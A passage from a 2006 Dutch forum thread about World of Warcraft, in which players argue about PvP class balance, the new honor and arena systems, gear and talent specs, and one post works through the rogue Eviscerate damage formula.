Het Grote World of Warcraft topic - Deel 96 Vorige deel Overzicht Volgende deel Laatste deel

Dit topic is onderdeel van een reeks. Ga naar het meest recente topic in deze reeks.

Pagina: 1 ... 7 ... 10 Laatste
Acties:
  • 3.743 views sinds 30-01-2008

Acties:
  • 0 Henk 'm!

• Kees
  • Registratie: Juni 1999
  • Laatst online: 12:28

Kees

Serveradmin / BOFH / DoC
Verwijderd schreef op woensdag 20 december 2006 @ 14:24:
[...]
Helemaal mee eens. :)

Gister op Turalyon met een premade alliance team (voornamelijk van <Resisted>) een uurtje AB gedaan, tegen PuG horde teams duurden de potjes zo'n 7 minuten. Tegen de ene premade horde was het leuker, maar die wonnen we ook na 20 minuten. :)
Ik doe alleen premades van mijn eigen guild, sinds de patch welgeteld 1 ab verloren tegen een andere premade, en het aantal dat we niet met 5-0 wonnen is nog op een hand te tellen.
En we hebben gewoon veel pret op ventrilo, en doen leuke damage, of blijven lang leven. Het is misschien niet leuk voor de tegenpartij, maar ik heb wel plezier erin.

"Een serveradmin, voluit een serveradministrator, is dan weer een slavenbeheerder oftewel een slavendrijver" - Rataplan

Acties:
  • 0 Henk 'm!

• sabriel
  • Registratie: Augustus 2006
  • Laatst online: 13-01-2021
Verwijderd schreef op woensdag 20 december 2006 @ 14:11:
iedereen die nog in de waan zit dat als je goed bent in PVP dat je dan skilled bent moeten echt serieus een keer wakker worden. als je een ENIGZINS competente premade hebt dan win je gewoon 80% van alle games, klaar. waarna je lekker in je GrandMarshal gear rond kunt lopen en iedereen in de pan kunt hakken. ( ook voor de verandering van het honor systeem kwam het hier op neer ). Of vinden jullie die ene warrior die toevallig asscandy heeft en mij crit voor 2,5 k ook super skilled ? ( en er dan ook nog een 3k execute achteraangooit )
Rank heeft mij nooit zoveel gezegd.
Op onze server liepen rogues rank 7 waar ik banger voor was dan warlord rogues.
Helaas was het oude systeem gebaseerd op "hoe meer tijd je hebt, de hoger je eindigd", en niet echt op skills. Eigenlijk hoop ik op een systeem dat dat er een ranglijst is, en als je mensen verslaat die vele malen hoger dan je staan dat je dan ook meer punten krijgt, terwijl als je iemand verslaat die op dezelde hoogte staat als jouw je gewoon minder punten krijgt.
Zo komen tenminste de echte skilled members bovenaan ipv mensen die gewoon te veel tijd hebben.

WoW Argent Dawn alliance :lvl60 Sabriell (Innovation)

Acties:
  • 0 Henk 'm!

• Muthas
  • Registratie: December 2005
  • Niet online

Muthas

O+

Nou, ik speel alweer een tijdje op een PVP server met m'n (lvl 36) lock. Mijn eerste poppetje. Ik blijf verbaasd over hoeveel kills ik als lock kan maken in PVP. Met BG sta ik altijd erg bovenaan (zowel met killings blows als honorable kills). Maar normale PVP is nog veel beter. Even een extreem geval, ik log in in Stranglethorn, zie ik een lvl 42 hum lock. Komt gelijk op me afstormen. Ik had nog stamm buf van priest, dem armor, was gessed en had healthstone. Voidy ook uit. Hij valt me aan, loopt erg dom te doen met fear en deathcoil volgens mij, maar mijn instant DoTs zaten ondertussen al wel op hem. Hij liep een beetje te lachen en had denk ik niet door dat hij net zo weinig hp had als ik. Hij had inmiddels al 2 fears op mij gehad, en begon met shadowbolt te casten (searing pain was genoeg geweest maarja). Ik doe, sacr voidy, hij crit mij met weet ik het, shield aborpt, ik fear, en searing pain hem to death.

Komt hij vervolgens terug, win ik weer, nu speelde hij echter slimmer, ik moest HS en SS gebruiken, maar won weer. Hij viel me overigens terwijl ik een lvl 34 elite crocodile aan het meppen was...

Daarnaast heb ik ook in Stranglethorn met behoorlijk wat gelijke lvls mages, hunters, priests en warriors gevochten. Alles won ik met 1/3 hp over, echt geen 1 keer verloren (en zonder healing te gebruiken, behalve drain life en siphon life).

Moeilijkste fight die ik heb gehad was tegen een lvl 36 pally. Duurde echt heel lang, hij gebruikte net als ik ook healing pots en had ook opeens full hp/mana. Ik was ook dood gegaan, maar kon weer terugkomen met SS. Uiteindelijk won ik toch, maar het was very close...

Ben affliction specced.

Acties:
  • 0 Henk 'm!

• Bokkie
  • Registratie: April 2000
  • Niet online
sabriel schreef op woensdag 20 december 2006 @ 14:21:
Hetzelfde wat ik hoor over Shamans, voor pvp vind ik ze in combinatie met de racials te overpowered om als priest aan te pakken. 1 vs 1 met shaman krijg ik geen spell gecast door alle interrupts-abilities welke de shaman heeft.
Enigste optie om shamans aan te pakken is shadowpriest imho, omdat shadowpriest instant damage en silence-spells heeft. Manadrain heeft een te lange castingtime dus ook waardeloos, terwijl een shaman waardeloos is als ie geen mana heeft.

Daarentegen heeft shaman naar wat ik heb vernomen nodig een PvE-buff nodig, maar daar kan ik niet over oordelen.
alle interupts-abilities? 1 maar op een 6 seconden (5 met talents) cooldown, 2 als je warstomp meetelt
grounding is geen interupt :P

| Respect to the man in the icecream van! |
| i'm not completely useless, I can be used as a bad example! |

Acties:
  • 0 Henk 'm!

• Phydomir
  • Registratie: September 2000
  • Laatst online: 12:27

Phydomir

Dennis

sabriel schreef op woensdag 20 december 2006 @ 14:27:
[...]

Rank heeft mij nooit zoveel gezegd.
Op onze server liepen rogues rank 7 waar ik banger voor was dan warlord rogues.
Helaas was het oude systeem gebaseerd op "hoe meer tijd je hebt, de hoger je eindigd", en niet echt op skills. Eigenlijk hoop ik op een systeem dat dat er een ranglijst is, en als je mensen verslaat die vele malen hoger dan je staan dat je dan ook meer punten krijgt, terwijl als je iemand verslaat die op dezelde hoogte staat als jouw je gewoon minder punten krijgt.
Zo komen tenminste de echte skilled members bovenaan ipv mensen die gewoon te veel tijd hebben.
één woord: Arena!

iRacing | Sim Gear: SimXperience AccuForce, Heusinkveld Pro, Custom 80/20 rig, Sparco R100 Sky

Acties:
  • 0 Henk 'm!

• Smultie
  • Registratie: Juni 2001
  • Niet online
Bokkie schreef op woensdag 20 december 2006 @ 14:28:
[...]

alle interupts-abilities? 1 maar op een 6 seconden (5 met talents) cooldown, 2 als je warstomp meetelt
Je hebt volgens mij echt géén idee hoe imba een interrupt is die op slechts (ja, slechts) 6 seconden cooldown zit. Helemaal als je d'r ook nog dikke dmg mee doet.

Acties:
  • 0 Henk 'm!

• sabriel
[...]
Als ik zelfs een spell met 2s casttime niet gecast krijgt betekend dit minstens 3 interrupt elke 6s.
waar komen de andere 2 dan vandaan ??

Moet toegeven dat het wel een skilled shaman was, 70% van de tijd zijn het noobs first class, heb ik er totaal geen moeite mee.

Weet iemand hoe het komt dat ik als priest 90% van de tijd een rogue aan zie komen ??
En dat is dan nog zonder perception en inproved detectbility die ja van warlocks kan krijgen.

Acties:
  • 0 Henk 'm!

• prutser001
  • Registratie: Oktober 2004
  • Laatst online: 11-09 22:54

prutser001

Vaak zit het tegen en soms zi

Ben gister respecced naar disc/holy (43/8/0) was hiervoor full shadow (0/0/51) en hiervoor disc/holy/shadow (9/2/40) als shadow spec had ik ongeveer 6800 mana buffed, maar outhealde de meeste holy en/of disc priests in raids met zo'n 3-4%.

Nu heb ik met alle buffs 7355mana, en 7602mana met alleen int spul (kan nog meer worden maar gaat ten koste van mijn +healing bonus) ik doe nu ~2700 heals met greater heal rank5, crit 12%, als ik crit ~4200-4700.

Als ik kijk naar pvp nu, WAARDELOOS, voordat ik me smite/holy fire gecast heb benk al dood door de interrupts. (ok shield) maar dmg is BAGGER gooi er powerinfusion overheen, pain supression, fear en nog meer maar tis iig geen shadow meer, die sinds 2.01 patch ook waardeloos is geworden waar ik eerst 1500 crits maakte met MB, na patch mag ik blij zijn met 1200-1300 (standaard 900-1000). Hiervoor kon ik ook 2 vs 1 winnen, maar na patch echt niet meer. Tegen locks maak ik geen kans meer, felguard charge "stun", fear, deathcoil, dood...

Ook sinds pvp systeem verandert is heb ik totaal geen intresse meer in pvp, ik was rank9, maar met de aankondiging dat "ranks" niets meer uit maakte ben ik er helemaal klaar mee. Rank was iets waar je naartoe werkte en als je dan rank 8-9-10 was had je een "status" als pvper, als je dan in je rank 8-10 pvp gear rond wagelde werdt je bekeken, als je nu in warlord gear rondtloopt wordt je gezien als grinder.

Maarja zal wel flames krijgen op deze post, dat het aan mijn "skill" ligt ofzo, etc boeiend :P

Asus Z390 Maximus IX Hero, Intel 9900K, RTX3080, 64GB DDR4 3000, 2TB NVME, Samsung 850Evo 1TB, 4 x 14TB Toshiba, Be Quiet SB 801, Samsung 34"

Acties:
  • 0 Henk 'm!

• sabriel
Dan moet ik dat eens gauw gaan testen.

Na de laatste patch nog niet veel kunnen pvp-en. Eerst 8 dagen niet kunnen spelen voordat blizzard doorhad dat er kapotte hardware was, en nu mijn moederbord naar de haaien, zodat ik nu op een laptop moet gaan spelen.

Maar hoe werkt dat arena
Ik hoor dat als je echt hogerop wilt komen je je in moet schrijven als team. Is dit waar ?

Acties:
  • 0 Henk 'm!

• Bokkie
  • Niet online
sabriel schreef op woensdag 20 december 2006 @ 14:39:
[...]

Als ik zelfs een spell met 2s casttime niet gecast krijgt betekend dit minstens 3 interrupt elke 6s.
waar komen de andere 2 dan vandaan ??

Moet toegeven dat het wel een skilled shaman was, 70% van de tijd zijn het noobs first class, heb ik er totaal geen moeite mee.

Weet iemand hoe het komt dat ik als priest 90% van de tijd een rogue aan zie komen ??
En dat is dan nog zonder perception en inproved detectbility die ja van warlocks kan krijgen.
zoals ik zei in het beste geval zit je tegen een Tauren shaman

Earthshock = spell interupt + 2 sec silence voor die school of magic (6 of 5 sec cooldown)
Warstomp = 2 sec stun
Grounding totem = absorbs harmfull spell (kapot met dmg)

was ie 2 hander? of 1h shield? dan kan je nog als ie een 1.3 dagger heeft je casts 'slowen'

meer niet

Acties:
  • 0 Henk 'm!

• pagani
  • Registratie: Januari 2002
  • Niet online
De "status" van alles hoger dan rank 10 was dat je geen leven had of een accountsharer was :P

Acties:
  • 0 Henk 'm!

• ImdaMned
  • Registratie: Juni 2005
  • Laatst online: 12:06
SMulTiE schreef op woensdag 20 december 2006 @ 13:28:
Mjah, Ring of Spellpower zonder sta en je cloak ook, bovendien kun je nog 200 hp op je legs/head zetten, zit je alweer aan de 4400 ;)

Raserian, wil je niet zó doen. We waren net bezig om aan te tonen dat ze níet imba waren.... :z
Oooh, heb je vast m'n oude profile gezien : P

Zit inmiddels op 3700 hp unbuffed hoor, but no wai dat ik 18 spelldmg en +1 to hit in ga wisselen voor 100 hp !

Acties:
  • 0 Henk 'm!

• prutser001

prutser001

johnnyv.nl schreef op woensdag 20 december 2006 @ 14:43:
De "status" van alles hoger dan rank 10 was dat je geen leven had of een accountsharer was :P
Mwah ken 4 gasten die gewoon zelf spelen en dan alleen s'avonds soms overdag als ze is niets te doen hadden, tuurlijk duurde even maar wel rank14, 1 was rank 14 voordat de "warlord items" kwamen.

Die moest dus eerst weer terug naar rank 13, en weer naar rank14 om die te kunnen gebruiken (1ste keer genaaid) nu is rank dus waardeloos en dat is dus de 2de keer genaaid.
Ze zijn dus helaas allemaal gestopt, en terug naar EQ2 en GW gegaan.

Asus Z390 Maximus IX Hero, Intel 9900K, RTX3080, 64GB DDR4 3000, 2TB NVME, Samsung 850Evo 1TB, 4 x 14TB Toshiba, Be Quiet SB 801, Samsung 34"

Acties:
  • 0 Henk 'm!

• Blistimo
  • Registratie: Maart 2001
  • Laatst online: 28-05-2021

Blistimo

Pestcontrol

SMulTiE schreef op woensdag 20 december 2006 @ 12:56:
[...]

Ik ben dus druid, en hoewel het zeker een fijn gevoel geeft als je een pvp-encounter wint (omdat je voor een groot deel aan je skill ligt ipv je klasse) is het af en toe ook érg frustrerend om tegen een undergeared/underskilled speler te verliezen.
Als druid moet je gewoon 4 keer zo hard werken.
Mja, maar outgeared worden is een kwestie van de hoeveelheid beschikbare tijd die een persoon heeft tov jou. Ik rende gister rond in een potje AB en kwam vlak voor het einde nog een warrior tegen. Hij was DW/fury met wat MC epix, Viskag en die BWL-random-onehanded axe en T1-PvP-reward spul aan. Ikzelf heb (zie ook sig) ook wat T1-PvP gear en TUF. Geartechnisch zou ik het natuurlijk altijd moeten verliezen. Spec-technisch heb ik de betere PvPspec, en ik kwam dan ook absurd dichtbij zijn execute-threshhold.
Nèt te laat dus.

Ja, dan word je dus outgeared maar zeker niet outplayed. Zat wel redelijk hardop te schelden, maar ik haal er dan wel weer voldoening uit dat ik dus bijna toe-to-toe loop met iemand die gewoon echt betere gear had dan ik. Oftewel, ik heb skill, hij niet :P

Then again... was het een warlock met greens geweest had ik ook in het stof gebeten, maar daar ligt het dus gewoon aan de class, niet aan de skills >:)

*gooit nog wat meer olie op het vuur*

D3 char(s)

Acties:
  • 0 Henk 'm!

• ImdaMned
prutser001 schreef op woensdag 20 december 2006 @ 14:52:
[...]

Mwah ken 4 gasten die gewoon zelf spelen en dan alleen s'avonds soms overdag als ze is niets te doen hadden, tuurlijk duurde even maar wel rank14, 1 was rank 14 voordat de "warlord items" kwamen.

Die moest dus eerst weer terug naar rank 13, en weer naar rank14 om die te kunnen gebruiken (1ste keer genaaid) nu is rank dus waardeloos en dat is dus de 2de keer genaaid.
Ze zijn dus helaas allemaal gestopt, en terug naar EQ2 en GW gegaan.
Burnout ftw !

Zie je wel vaker met rank 14 spelers

Acties:
  • 0 Henk 'm!

• Phydomir

Phydomir

Dennis

sabriel schreef op woensdag 20 december 2006 @ 14:43:
[...]

Dan moet ik dat eens gauw gaan testen.

Na de laatste patch nog niet veel kunnen pvp-en. Eerst 8 dagen niet kunnen spelen voordat blizzard doorhad dat er kapotte hardware was, en nu mijn moederbord naar de haaien, zodat ik nu op een laptop moet gaan spelen.

Maar hoe werkt dat arena
Ik hoor dat als je echt hogerop wilt komen je je in moet schrijven als team. Is dit waar ?
Yep. Je kunt een team samenstellen en dan 2vs2, 3vs3 of 5vs5 spelen. Dit werkt met een rank systeem waarbij je alleen tegen gelijk waardige tegenstanders zult uit komen. Echter gaat dit pas vanaf lvl 70 echt werken.

iRacing | Sim Gear: SimXperience AccuForce, Heusinkveld Pro, Custom 80/20 rig, Sparco R100 Sky

Acties:
  • 0 Henk 'm!

• Kevinp
  • Laatst online: 12-09 11:04
[...]

als warrior ga ik op shamans gewoon uit totem range staan, die chain lghtning krijgt me niet neer voordat ik zei OOM zijn. En met normala hits zonder totems krijgen ze me ook niet neer :).

d'r is maar één ding in het leven wat moet, en dat is dood gaan.

Acties:
  • 0 Henk 'm!

• Brazza
  • Registratie: November 2000
  • Laatst online: 02-08 07:15

Brazza

Byte me!

prutser001 schreef op woensdag 20 december 2006 @ 14:42:
Ben gister respecced naar disc/holy (43/8/0) was hiervoor full shadow (0/0/51) en hiervoor disc/holy/shadow (9/2/40) als shadow spec had ik ongeveer 6800 mana buffed, maar outhealde de meeste holy en/of disc priests in raids met zo'n 3-4%.
Outhealen kan iedereen wel, gewoon spammen. Maar ben je dan ook veel aan het overhealen?
Ik zelf ben nu ook shadow op me alt. Best leuk, alleen net zoals je zegt. Je hebt geen schijn kans tegen andere casters. helemaal als je Benediction/anathama equiped hebt..
Enige waarom ik PvP met me priest is omdat ik die staff (looks!) wil + healing mace.

Acties:
  • 0 Henk 'm!

Verwijderd

Brazza schreef op woensdag 20 december 2006 @ 14:58:
[...]
Enige waarom ik PvP met me priest is omdat ik die staff (looks!) wil + healing mace.
Staff? Welke staff?

Linkje? :P

Acties:
  • 0 Henk 'm!

Verwijderd

Phydomir schreef op woensdag 20 december 2006 @ 14:57:
[...]

Yep. Je kunt een team samenstellen en dan 2vs2, 3vs3 of 5vs5 spelen. Dit werkt met een rank systeem waarbij je alleen tegen gelijk waardige tegenstanders zult uit komen. Echter gaat dit pas vanaf lvl 70 echt werken.
Gelijkwaardig ?? Hoe wordt dit berekend dan ??

Acties:
  • 0 Henk 'm!

• Brazza
  • Registratie: November 2000
  • Laatst online: 02-08 07:15

Brazza

Byte me!

http://www.thottbot.com/?sh=6187
GM staff :)

offtopic:
gief world server!

[ Voor 7% gewijzigd door Brazza op 20-12-2006 15:05 ]

Acties:
  • 0 Henk 'm!

• ImdaMned
Ga naar thottbot.com en zoek op warlord / marshall

Acties:
  • 0 Henk 'm!

• Bokkie
  • Niet online
Kevinp schreef op woensdag 20 december 2006 @ 14:58:
[...]

als warrior ga ik op shamans gewoon uit totem range staan, die chain lghtning krijgt me niet neer voordat ik zei OOM zijn. En met normala hits zonder totems krijgen ze me ook niet neer :).
meest gebruikte tactiek tegen warriors is gewoon achter ze aan lopen, frostshock, Earthbind, searing, en maar slaan met je 1-hand + shield (ls up @ all times) althans zo deed ik dat vroeger :P en won ook vaak

Acties:
  • 0 Henk 'm!

• RaseriaN
  • Registratie: Mei 2005
  • Laatst online: 08-09 16:37

RaseriaN

So much choices..

@Eviscerate over 3k.

code:
1
2
3
4
5
For example, a Rogue with 1000 Attack Power using 5 combo points of Eviscerate Rank 9 will have a damage range of: 

Modifier = 1000 * (5 * 0.03) = 150
Eviscerate = (904 + 150) - (1012 + 150) = 1054 - 1162 damage
Critical Eviscerate = 2108 - 2324 damage

Dit is een voorbeeld met een Rogue die 1000 Attack Power heeft (vrij normaal voor T2/T2.5).
Stel dit nou eens voor met 2000 Attack Power :

code:
1
2
3
4
5
For example, a Rogue with 2000 Attack Power using 5 combo points of Eviscerate Rank 9 will have a damage range of: 

Modifier = 2000 * (5 * 0.03) = 300
Eviscerate = (904 + 300) - (1012 + 300) = 1204 - 1312 damage
Critical Eviscerate = 2408 - 2628 damage

Zelfs al zou je Improved Eviscrate hebben (3 Talent Points) dan kom je nog maar op 2845 uit.
Als je dan ook nog de Aggression (2 Talent Points) talent hebt, 6% meer damage, kom je op 3015 uit. (En als de talents stacken kom je op 3122 uit).
En dit op een target zonder armor...

Dus nee, het is niet mogelijk om op dit moment (zonder beserker) zomaar een 3k Eviscrate crit eruit te persen (ja, met alle worldbuffs enzo gaat het (of beserker) maar dit is totaal niet realistisch tegenover de redelijke vaak voorkomende hoge crits van een Warlock).

Geen 1 rogue loopt met minstens 2k AttackPower rond in een BG en heeft daarna het geluk om een 0 armor target tegen te komen en ook nog eens de hoogste damage eruit te persen (range!)
Tevens moet hij Imp Eviscrate(of 5/5 DeathDealer) en de Aggression talent anders haalt hij het alsnog niet!

Acties:
  • 0 Henk 'm!

Verwijderd

klopt, heb je gelijk in.

Acties:
  • 0 Henk 'm!

• prutser001

prutser001

ImdaMned schreef op woensdag 20 december 2006 @ 14:55:
[...]

Burnout ftw !

Zie je wel vaker met rank 14 spelers
Nah, Guilds/spelers die eerst nooit pvp deden zijn allemaal in BG's omdat ze nu wel gear kunnen halen. Stikt er nu van de "noobs" eerst waren er echt goede pvpers, meeste zijn allemaal "AFK" staan beetje in de rondte te kijken zodra de tegenpartij komt ookal is het er maar 1, rennen ze weg of doen niets.
Kortom BG's waren al niet best, maar nu is het er alleen maar erger op geworden.

Acties:
  • 0 Henk 'm!

• Bokkie
  • Niet online
wat dat betreft is evis best sucky :P
mijn max op dit moment is een 2009 op een 5 sundered target met 5 cp's met aggression, ZG gear en 904 unbuffed attackpower

Acties:
  • 0 Henk 'm!

Verwijderd

Ja, mooi! :)

Dank je :)

Nou ja, eerst maar eens m'n Prophecy schouders vervangen met de Field Marshal schouders. Het enige stukje T2 dat ik mis en aangezien ik nooit meer, of in ieder geval niet snel, meer in BWL kom. :)

[ Voor 42% gewijzigd door Verwijderd op 20-12-2006 15:19 ]

Acties:
  • 0 Henk 'm!

• Smultie
  • Niet online
ImdaMned schreef op woensdag 20 december 2006 @ 14:50:
[...]

Oooh, heb je vast m'n oude profile gezien : P

Zit inmiddels op 3700 hp unbuffed hoor, but no wai dat ik 18 spelldmg en +1 to hit in ga wisselen voor 100 hp !
Gelukkig had ik het over On_E die zei dat ie maar 4200 hp unbuffed had ;)

Acties:
  • 0 Henk 'm!

• prutser001

prutser001

Brazza schreef op woensdag 20 december 2006 @ 14:58:
[...]

Outhealen kan iedereen wel, gewoon spammen. Maar ben je dan ook veel aan het overhealen?
Ik zelf ben nu ook shadow op me alt. Best leuk, alleen net zoals je zegt. Je hebt geen schijn kans tegen andere casters. helemaal als je Benediction/anathama equiped hebt..
Nee niet outhealen, ik gebruik "healbot" addon, dis een klik/heal ding, deze pakt zelf de "rank heal" die nodig is, ik doe ook bijna de helft langer met mijn mana, alleen met fights waar je "moet overhealen" (bloodlord) daar gebruik ik addon niet.

Acties:
  • 0 Henk 'm!

Verwijderd

Blistimo schreef op woensdag 20 december 2006 @ 14:55:
[...]

Then again... was het een warlock met greens geweest had ik ook in het stof gebeten, maar daar ligt het dus gewoon aan de class, niet aan de skills >:)

*gooit nog wat meer olie op het vuur*
Ach dat is het makkelijke smoesje wat niet-locks nu altijd gebruiken als ze weer eens ge-bbqpwned worden door een SKILLED Warlock :)

Maar geloof me de Warlock lacht er niet minder om ;)

Acties:
  • 0 Henk 'm!

• ImdaMned
SMulTiE schreef op woensdag 20 december 2006 @ 15:12:
[...]

Gelukkig had ik het over On_E die zei dat ie maar 4200 hp unbuffed had ;)
Ach, het had zomaar gekunt : )

Hoe ist met die overlopen van een caesartje? was ook aan het spammen op thaddius zag ik, heeft ie snel gedaan, of heeft ie een char overgekocht en gelijk epix bij jullie geleeched?

Acties:
  • 0 Henk 'm!

• thewizard2006
  • Registratie: Januari 2006
  • Laatst online: 08-08 14:23
Gennis schreef op woensdag 20 december 2006 @ 13:14:
[...]

mage
polymorph
instant cast pyroblast voor 3.5k
fire blast van 1k+
frost nova
cone of cold
elemental pet
dragons breath
slow

Moet ik doorgaan of heb je het nu wel door?

Warlock is niet easy mode. Maar als een goede speler de warlock bestuurt, dan is hij zeer dodelijk.
dbtje dom he om te sheepen en dan instant cast te doen, terwijl als je eerst gewoon die 6sec pyroblast doet en daarna inst cast je nog een pyro kan schieten.......:) je kan ook gewoon gelijk alle abillities van iedereen opnoemen

We've got simultaneous epidemics of obesity and starvation

Acties:
  • 0 Henk 'm!

• Smultie
  • Niet online
ImdaMned schreef op woensdag 20 december 2006 @ 15:19:
[...]

Ach, het had zomaar gekunt : )

Hoe ist met die overlopen van een caesartje? was ook aan het spammen op thaddius zag ik, heeft ie snel gedaan, of heeft ie een char overgekocht en gelijk epix bij jullie geleeched?
Hij heeft z'n char gepowerleveled en heeft laatst inderdaad onze first kill Thaddius meegemaakt, ach, het kan verkeren ^^

Acties:
  • 0 Henk 'm!

• Qck
  • Registratie: Juli 2003
  • Laatst online: 10:48

Qck

Bazinga

thewizard2006 schreef op woensdag 20 december 2006 @ 15:22:
[...]

dbtje dom he om te sheepen en dan instant cast te doen, terwijl als je eerst gewoon die 6sec pyroblast doet en daarna inst cast je nog een pyro kan schieten.......:) je kan ook gewoon gelijk alle abillities van iedereen opnoemen
Wat dacht je wat ik aan het doen was dan? :P

Music is not just a sound, it's a way of living.

Acties:
  • 0 Henk 'm!

• Valkyre
  • Registratie: April 2002
  • Laatst online: 07:13

Valkyre

Kitesurf FTW!

thewizard2006 schreef op woensdag 20 december 2006 @ 15:22:
[...]

wat dacht je van de DB en water elemental :)

maar goed vindt het sowieso raar dat iedereen er van uit de er gecrit wordt met 2k+ of 3k+
net alsof mages en locks altijd critten!

wow is gemaakt voor PVE, dat je kan PVPen is leuk, maar verwacht daarom niet perfect gebalanceerd classes in PVP.
juist voor PVE doeleinde zijn de warlocks wat gebuffed, omdat niemand meer locks mee nam in Naxx. nu met de 40 debuff slots en de buff, is vast weer nuttig om locks mee te nemen.

nu ik met mijn mage weer naar fire gespecced ben, moet ik zeggen dat de verhouding van een mage vs lock ongeveer op 40 / 60 ligt.

Alleen snap ik niet waarom hunters een silencing slot hebben gekregen? hunters hebben al zat middelen om casters te stunnen/irriteren.

iRacing Profiel

Acties:
  • 0 Henk 'm!

• Kevinp
Bokkie schreef op woensdag 20 december 2006 @ 15:05:
[...]

meest gebruikte tactiek tegen warriors is gewoon achter ze aan lopen, frostshock, Earthbind, searing, en maar slaan met je 1-hand + shield (ls up @ all times) althans zo deed ik dat vroeger :P en won ook vaak
Warstomp hamstrink en concusion blow dan loop je niet meer zo hard ;). Ik vind die fire totems zo verschrikkelijk irritant.
Gohan-san schreef op woensdag 20 december 2006 @ 15:34:
[...]

maar goed vindt het sowieso raar dat iedereen er van uit de er gecrit wordt met 2k+ of 3k+

wow is gemaakt voor PVE, dat je kan PVPen is leuk, maar verwacht daarom niet perfect gebalanceerd classes in PVP.
juist voor PVE doeleinde zijn de warlocks wat gebuffed, omdat niemand meer locks mee nam in Naxx. nu met de 40 debuff slots en de buff, is vast weer nuttig om locks mee te nemen.

nu ik met mijn mage weer naar fire gespecced ben, moet ik zeggen dat de verhouding van een mage vs lock ongeveer op 40 / 60 ligt.

Alleen snap ik niet waarom hunters een silencing slot hebben gekregen? hunters hebben al zat middelen om casters te stunnen/irriteren.
warlocks werden vast nog wel meegenomen maar in mindere mate, wij hebben d'r momenteel 4 in de guild die waarschijnlijk ook allemaal gewoon mee kunnen straks. Die imp buff is gewoon nodig zeker in het begin van naxx. Farleana kan slaan voor 8k en dan ben je zo door je HP heen.

[ Voor 55% gewijzigd door Kevinp op 20-12-2006 15:41 ]

Acties:
  • 0 Henk 'm!

• Phydomir

Phydomir

Dennis

Verwijderd schreef op woensdag 20 december 2006 @ 15:03:
[...]

Gelijkwaardig ?? Hoe wordt dit berekend dan ??
Er worden ranks/punten bij gehouden. Zo wordt je aan elkaar gekoppelt. Op de WoW site staat het wat uitgebreider uitgelegt.

Acties:
  • 0 Henk 'm!

Verwijderd

Verwijderd schreef op woensdag 20 december 2006 @ 15:17:
[...]

Ach dat is het makkelijke smoesje wat niet-locks nu altijd gebruiken als ze weer eens ge-bbqpwned worden door een SKILLED Warlock :)

Skilled en niet-skilled mensen haal je er zo tussenuit hoor, als je een beetje vaak pvped. En dan boeit gear echt geen ruk om dat te kunnen herkennen.

Ik zit vaak in een premade met wat alts (in greens en blues ja) van ex rank 13/14 mensen en dan winnen we alles wat we tegenkomen. Gewoon een kwestie van weten wat je moet doen en het dan ook doen.

AB win je niet op gear, dat win je op coördinatie, leiderschap en individuele spelerskills (o.a. vlaggen taggen, groepjes alliance ophouden/afleiden, taggen interrupten, healers eerst doodmaken, enz.).

WSG is wel wat meer gearafhankelijk. Met een dikke tank en 2 healers is het verrekte moeilijk om scoren tegen te houden. Toch kun je een grote voorsprong halen of gearachterstand goedmaken met goede tactieken, goeie coördinatie en skills van de spelers.

Acties:
  • 0 Henk 'm!

• Denko
  • Registratie: Januari 2003
  • Laatst online: 14-09 22:39

Denko

|{ing Øf ßlitz

Verwijderd schreef op woensdag 20 december 2006 @ 15:17:
[...]

ik vind et heerlijk hoe mensen over locks zeuren, me pala geniet ervan :D, zover nog niet echt locks tegengekomen waar ik problemen mee had

PSN & XBL: Denkoyugo

Acties:
  • 0 Henk 'm!

Verwijderd

Kan iemand uitleggen hoe het precies zit met de arenas ?? Heb een pagina terug gelezen dat je bij gelijkwaardige tegenstanders zou komen. Hoe wordt dit gedaan dan ?

Acties:
  • 0 Henk 'm!

• prutser001

prutser001

Gohan-san schreef op woensdag 20 december 2006 @ 15:34:
[...]

En wat met shadow priests? niemand wil shadow priests op raids, totnutoe heb ik maar 1 keer een shadow priest filmpie in Naxx gezien. Nee maar priests MOETEN healen, daar is "class" toch voor?
Nee, shadowpriest is er alleen maar om "makkelijker" te levelen. Ik ben totnutoe 1 keer als shadow actief geweest in ZG op spiderboss om mana te drainen. En warlock met demonology ging bij ons altijd mee, Afliction ook (of hoe dat heet) In mijn guild speel je de spec die je zelf wilt, aangezien Shadow priest niet echt een "spec" is en je nogsteeds kan healen wordt dat ook van je verwacht.
Warlock zal ondanks welke spec meer dmg doen, als ik geweten had wat ik nu weet had ik mage/lock/warrior gegaan.

En ja 100% eens silence shot, "mana drain shot", dat "stun" gedoe dat je in rondjes blijft lopen, en dan nog die mega irritante pet.

Acties:
  • 0 Henk 'm!

Verwijderd

Denko schreef op woensdag 20 december 2006 @ 15:47:
[...]

ik vind et heerlijk hoe mensen over locks zeuren, me pala geniet ervan :D, zover nog niet echt locks tegengekomen waar ik problemen mee had
Vervelende loladins ook altijd ;) Ben je toevallig level 1? j/k

Acties:
  • 0 Henk 'm!

• prutser001

prutser001

Verwijderd schreef op woensdag 20 december 2006 @ 15:55:
Kan iemand uitleggen hoe het precies zit met de arenas ?? Heb een pagina terug gelezen dat je bij gelijkwaardige tegenstanders zou komen. Hoe wordt dit gedaan dan ?
Vroeg me dit ook af, ging het eens proberen kwam uit tegen een volledige tier 2.5 geared shaman en rogue... ik heb geen tier 2 ofzo, en mijn andere teammaat ook niet.. w2g blizztards :P

Acties:
  • 0 Henk 'm!

Verwijderd

Verwijderd schreef op woensdag 20 december 2006 @ 15:55:
Phydomir schreef op woensdag 20 december 2006 @ 15:38:
[...]

Er worden ranks/punten bij gehouden. Zo wordt je aan elkaar gekoppelt. Op de WoW site staat het wat uitgebreider uitgelegt.
Misschien Phydomir wel. :P
prutser001 schreef op woensdag 20 december 2006 @ 16:04:
[...]
Vroeg me dit ook af, ging het eens proberen kwam uit tegen een volledige tier 2.5 geared shaman en rogue... ik heb geen tier 2 ofzo, en mijn andere teammaat ook niet.. w2g blizztards :P
Als het op basis van honor/ranks gaat, heeft gear er dus weinig mee te maken. :)

Misschien dat hier meer info staat.

[ Voor 31% gewijzigd door Verwijderd op 20-12-2006 16:11 ]

Acties:
  • 0 Henk 'm!

• prutser001

prutser001

Dus als je heel erg actief sinds lvl 19 bent in BG's en je net lvl 60 haalt, rank 11 bent, met je "bloodlord/general" gear wat pis is vergeleken met tier2/2.5/3 ? dan heeft je "rank?/honor" niets te zeggen want dan ben je gewoon de sjaak.

Acties:
  • 0 Henk 'm!

• Valkyre

Valkyre

Kitesurf FTW!

prutser001 schreef op woensdag 20 december 2006 @ 16:02:
[...]

En wat met shadow priests? niemand wil shadow priests op raids, totnutoe heb ik maar 1 keer een shadow priest filmpie in Naxx gezien. Nee maar priests MOETEN healen, daar is "class" toch voor?
